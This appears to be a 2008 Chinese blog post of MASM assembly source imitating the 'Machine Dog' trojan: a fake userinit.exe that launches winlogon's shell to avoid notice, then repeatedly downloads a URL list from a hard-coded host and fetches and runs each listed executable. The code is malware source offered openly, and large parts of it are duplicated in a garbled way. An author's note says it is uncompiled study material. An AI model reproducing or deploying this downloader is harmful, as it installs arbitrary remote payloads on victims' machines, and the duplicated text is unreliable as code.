作者在 2008-06-30 13:07:39 发布以下内容
; 仿机器狗的感染文件代码
; by naitm(http://hi.baidu.com/naitm)
;
; ml /c /coff /nologo userinit.asm
; Link /align:0x10 /subsystem:windows /nologo userinit.obj
; by naitm(http://hi.baidu.com/naitm)
;
; ml /c /coff /nologo userinit.asm
; Link /align:0x10 /subsystem:windows /nologo userinit.obj
.386
.model flat,stdcall
option casemap:none
.model flat,stdcall
option casemap:none
; Include 文件定义
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
include wininet.inc
includelib wininet.lib
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
include wininet.inc
includelib wininet.lib
; 数据段
.data
nThreadCount dd 0
szTempPath db '.',0
szValueName db 'Shell',0
szUser32Dll db 'user32.dll',0
szLoadRemoteFonts db 'LoadRemoteFonts',0
szSubKey db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
szUrlList db 'http://10.0.0.90/cert.cer',0
nThreadCount dd 0
szTempPath db '.',0
szValueName db 'Shell',0
szUser32Dll db 'user32.dll',0
szLoadRemoteFonts db 'LoadRemoteFonts',0
szSubKey db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
szUrlList db 'http://10.0.0.90/cert.cer',0
; 代码段
.code
;以当前进程的STARTUPINFO启动exe文件
_RunIt proc @lpExePath
local @stStartupInfo:STARTUPINFO
local @stProcessInformation:PROCESS_INFORMATION
local @stProcessInformation:PROCESS_INFORMATION
invoke GetStartupInfo,addr @stStartupInfo
invoke CreateProcess,NULL,@lpExePath,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,\
NULL,NULL,addr @stStartupInfo,addr @stProcessInformation
.if eax == 0
invoke CloseHandle,@stProcessInformation.hThread
invoke CloseHandle,@stProcessInformation.hProcess
.endif
ret
_RunIt endp
invoke CreateProcess,NULL,@lpExePath,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,\
NULL,NULL,addr @stStartupInfo,addr @stProcessInformation
.if eax == 0
invoke CloseHandle,@stProcessInformation.hThread
invoke CloseHandle,@stProcessInformation.hProcess
.endif
ret
_RunIt endp
;下载文件
_DownloadFile proc @lpURL,@lpSaveFile,@Buffer
local @hInternet,@hInternetFile,@hLocalFile,@NumberOfBytesWritten,@nNumberOfBytesToWrite,@nWriteCount
local @lpbuffer[200h]:BYTE
xor eax,eax
mov @nWriteCount,eax
invoke InternetOpen,offset szValueName,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
.if eax != NULL
mov @hInternet, eax
invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONNECT_TIMEOUT,@Buffer,4
invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT,@Buffer,4
invoke InternetOpenUrl,@hInternet,@lpURL,NULL,NULL,INTERNET_FLAG_EXISTING_CONNECT,0
.if eax != NULL
mov @hInternetFile, eax
mov @nNumberOfBytesToWrite, 0
mov @NumberOfBytesWritten, 200h
invoke HttpQueryInfo,@hInternetFile,HTTP_QUERY_STATUS_CODE,addr @lpbuffer,\
addr @NumberOfBytesWritten,@nNumberOfBytesToWrite
.if eax != NULL
invoke CreateFile,@lpSaveFile,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,0,0
.if eax != 0FFFFFFFFh
mov @hLocalFile, eax
.while TRUE
mov @nNumberOfBytesToWrite,0
invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
.break .if (!eax)
.break .if (@nNumberOfBytesToWrite==0)
inc @nWriteCount
invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,addr @NumberOfBytesWritten,0
.endw
invoke SetEndOfFile,@hLocalFile
invoke CloseHandle,@hLocalFile
.endif
.endif
invoke InternetCloseHandle,@hInternetFile
.endif
invoke InternetCloseHandle,@hInternet
.endif
mov eax,@nWriteCount
ret
local @lpbuffer[200h]:BYTE
xor eax,eax
mov @nWriteCount,eax
invoke InternetOpen,offset szValueName,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
.if eax != NULL
mov @hInternet, eax
invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONNECT_TIMEOUT,@Buffer,4
invoke InternetSetOption,@hInternet,INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT,@Buffer,4
invoke InternetOpenUrl,@hInternet,@lpURL,NULL,NULL,INTERNET_FLAG_EXISTING_CONNECT,0
.if eax != NULL
mov @hInternetFile, eax
mov @nNumberOfBytesToWrite, 0
mov @NumberOfBytesWritten, 200h
invoke HttpQueryInfo,@hInternetFile,HTTP_QUERY_STATUS_CODE,addr @lpbuffer,\
addr @NumberOfBytesWritten,@nNumberOfBytesToWrite
.if eax != NULL
invoke CreateFile,@lpSaveFile,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,0,0
.if eax != 0FFFFFFFFh
mov @hLocalFile, eax
.while TRUE
mov @nNumberOfBytesToWrite,0
invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
.break .if (!eax)
.break .if (@nNumberOfBytesToWrite==0)
inc @nWriteCount
invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,addr @NumberOfBytesWritten,0
.endw
invoke SetEndOfFile,@hLocalFile
invoke CloseHandle,@hLocalFile
.endif
.endif
invoke InternetCloseHandle,@hInternetFile
.endif
invoke InternetCloseHandle,@hInternet
.endif
mov eax,@nWriteCount
ret
_DownloadFile endp
_DownloadEXERunIt proc @lpURL
local @DownTimes
local @TempFileName[100h]:BYTE
local @szUrl[100h]:BYTE
local @TempFileName[100h]:BYTE
local @szUrl[100h]:BYTE
mov @DownTimes,3Ch
invoke lstrcpy,addr @szUrl,@lpURL
invoke RtlZeroMemory,addr @TempFileName,100h
invoke GetTempFileName,offset szTempPath,NULL,0,addr @TempFileName
.repeat
invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h
.if eax != NULL
invoke _RunIt,addr @TempFileName
.break
.else
invoke Sleep,3E8h
dec @DownTimes
.endif
.until (!@DownTimes)
dec nThreadCount
ret
invoke lstrcpy,addr @szUrl,@lpURL
invoke RtlZeroMemory,addr @TempFileName,100h
invoke GetTempFileName,offset szTempPath,NULL,0,addr @TempFileName
.repeat
invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h
.if eax != NULL
invoke _RunIt,addr @TempFileName
.break
.else
invoke Sleep,3E8h
dec @DownTimes
.endif
.until (!@DownTimes)
dec nThreadCount
ret
_DownloadEXERunIt endp
start:
main proc
main proc
local @hKey,@nSizeOfPath,@hFile,@hObject,@lpBaseAddress
local @szWinlogonPath[104h]:BYTE
local @szWinlogonPath[104h]:BYTE
;加载user32.dll,执行LoadRemoteFonts函数 (这函数是干吗的?)
invoke LoadLibrary,offset szUser32Dll
.if eax != NULL
invoke GetProcAddress,eax,offset szLoadRemoteFonts
.if eax != NULL
call eax
.endif
.endif
;启动winlogon
invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szSubKey,0,KEY_READ,addr @hKey
.if eax == ERROR_SUCCESS
mov @nSizeOfPath,104h
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke RegQueryValueEx,@hKey,offset szValueName,0,NULL,addr @szWinlogonPath,addr @nSizeOfPath
invoke _RunIt,addr @szWinlogonPath
invoke RegCloseKey,@hKey
.endif
;检查网络是否连接,不断重试
invoke Sleep,3E8h
.while TRUE
invoke InternetGetConnectedState,addr @nSizeOfPath,0
.break .if eax
.endw
;取一个临时文件名,并下载列表
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke GetTempFileName,offset szTempPath,0,0,addr @szWinlogonPath
invoke Sleep,3E8h
DownloadList:
.while TRUE
invoke _DownloadFile,offset szUrlList,addr @szWinlogonPath,1388h
.break .if eax
.endw
;打开列表文件,验证后开始下载
invoke CreateFile,addr @szWinlogonPath,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL
.if eax != INVALID_HANDLE_VALUE
mov @hFile,eax
invoke GetFileSize,@hFile,NULL
.if eax >= 0Fh ;文件提价小于F个字节则认为下载文件错误
invoke CreateFileMapping,@hFile,NULL,PAGE_READONLY,0,0,NULL
.if eax != NULL
mov @hObject,eax
invoke MapViewOfFile,eax,FILE_MAP_READ,0,0,0
.if eax != NULL
mov @lpBaseAddress,eax
mov esi,eax
BeginDownEXE:
lea edi,@szWinlogonPath
invoke RtlZeroMemory,edi,104h
;查找回车标志,查找到后将@szWinlogonPath传入_DownloadEXERunIt
.repeat
lodsb
.if al == 0Ah
lodsb
.endif
.if al == 0Dh
.if @szWinlogonPath != 0
inc nThreadCount
invoke CreateThread,NULL,0,offset _DownloadEXERunIt,addr @szWinlogonPath,0,addr @nSizeOfPath
invoke CloseHandle,eax
invoke Sleep,64h
.endif
jmp BeginDownEXE
.endif
stosb
.until (!al)
invoke LoadLibrary,offset szUser32Dll
.if eax != NULL
invoke GetProcAddress,eax,offset szLoadRemoteFonts
.if eax != NULL
call eax
.endif
.endif
;启动winlogon
invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szSubKey,0,KEY_READ,addr @hKey
.if eax == ERROR_SUCCESS
mov @nSizeOfPath,104h
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke RegQueryValueEx,@hKey,offset szValueName,0,NULL,addr @szWinlogonPath,addr @nSizeOfPath
invoke _RunIt,addr @szWinlogonPath
invoke RegCloseKey,@hKey
.endif
;检查网络是否连接,不断重试
invoke Sleep,3E8h
.while TRUE
invoke InternetGetConnectedState,addr @nSizeOfPath,0
.break .if eax
.endw
;取一个临时文件名,并下载列表
invoke RtlZeroMemory,addr @szWinlogonPath,104h
invoke GetTempFileName,offset szTempPath,0,0,addr @szWinlogonPath
invoke Sleep,3E8h
DownloadList:
.while TRUE
invoke _DownloadFile,offset szUrlList,addr @szWinlogonPath,1388h
.break .if eax
.endw
;打开列表文件,验证后开始下载
invoke CreateFile,addr @szWinlogonPath,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL
.if eax != INVALID_HANDLE_VALUE
mov @hFile,eax
invoke GetFileSize,@hFile,NULL
.if eax >= 0Fh ;文件提价小于F个字节则认为下载文件错误
invoke CreateFileMapping,@hFile,NULL,PAGE_READONLY,0,0,NULL
.if eax != NULL
mov @hObject,eax
invoke MapViewOfFile,eax,FILE_MAP_READ,0,0,0
.if eax != NULL
mov @lpBaseAddress,eax
mov esi,eax
BeginDownEXE:
lea edi,@szWinlogonPath
invoke RtlZeroMemory,edi,104h
;查找回车标志,查找到后将@szWinlogonPath传入_DownloadEXERunIt
.repeat
lodsb
.if al == 0Ah
lodsb
.endif
.if al == 0Dh
.if @szWinlogonPath != 0
inc nThreadCount
invoke CreateThread,NULL,0,offset _DownloadEXERunIt,addr @szWinlogonPath,0,addr @nSizeOfPath
invoke CloseHandle,eax
invoke Sleep,64h
.endif
jmp BeginDownEXE
.endif
stosb
.until (!al)
invoke UnmapViewOfFile,@lpBaseAddress
.endif
invoke CloseHandle,@hObject
.endif
.else
invoke CloseHandle,@hFile
jmp DownloadList
.endif
invoke CloseHandle,@hFile
.else
jmp DownloadList ;无法打开则重新下载
.endif
.endif
invoke CloseHandle,@hObject
.endif
.else
invoke CloseHandle,@hFile
jmp DownloadList
.endif
invoke CloseHandle,@hFile
.else
jmp DownloadList ;无法打开则重新下载
.endif
;不断sleep,直到所有线程结束
.while nThreadCount
invoke Sleep,64h
.endw
invoke ExitProcess,0
.while nThreadCount
invoke Sleep,64h
.endw
invoke ExitProcess,0
main endp
end start
;【学习注释】 这篇代码我还没有编译过,因为还不知道怎么建立一个安全的病毒研究环境(有人知道的话请回复,不胜感激),而且其中的一个函数还没有弄明白(就是LoadRemoteFonts这个函数,不知道为什么一上来就先执行它,去掉行不行)